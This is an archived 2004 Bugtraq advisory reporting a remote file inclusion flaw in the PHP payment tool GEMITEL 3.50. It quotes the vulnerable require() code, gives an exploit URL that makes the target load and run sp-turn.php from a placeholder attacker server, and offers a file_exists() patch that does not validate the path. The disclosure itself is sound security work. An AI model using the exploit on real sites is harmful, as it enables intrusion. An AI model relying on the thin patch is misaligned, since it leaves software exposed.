lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <20040415132226.20224.qmail@mail.securityfocus.com>
Date: Thu, 15 Apr 2004 14:26:52 +0100
From: "jaguar" <webmaster@...ab.com>
To: bugtraq@...urityfocus.com <bugtraq@...urityfocus.com>
Subject: Include vulnerability in GEMITEL v 3.50


GEMITEL V 3 build 50  :: include vulnerability



URL : http://www.isesam.com/
FORUM : http://www.isesam.com/forums/gemitel/thread_open.shtml
Vendor has been contacted.





Description :
---------------

Gemitel is a free software written in php that allows to manage micro payments like allopass, mediapaiement, optelo-Sponsup or Rentabiliweb.




Vulnerability :
----------------


File :  html/affich.php

Code:
*****************************************************************************

$f_inc=$base."sp-turn.php";
$plus = "../";               // rajoute au chemin pour trouver les fichiers .txt
require("$f_inc");
//require("sp-turn.php");

*******************************************************************************

You can include sp-turn.php from where you want by specifying the variable $base.


Exploit :
----------

http://[vulnerable host]/[Gemitel folder]/html/affich.php?base=http://[your server]/

In [your server] you must have a sp-turn.php file which will be included by vulnerable host.



Solution:
-----------

Replace :

$f_inc=$base."sp-turn.php";
$plus = "../";               // rajoute au chemin pour trouver les fichiers .txt
require("$f_inc");
//require("sp-turn.php");

By

$f_inc=$base."sp-turn.php";
$plus = "../";               // rajoute au chemin pour trouver les fichiers .txt
if(file_exists($f_inc)){require("$f_inc");}
//require("sp-turn.php");





----------------------------------------------------------
jaguar[at]wulab.com
http://www.wulab.com  [hacking & Security]
-----------------------------------------------------------

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ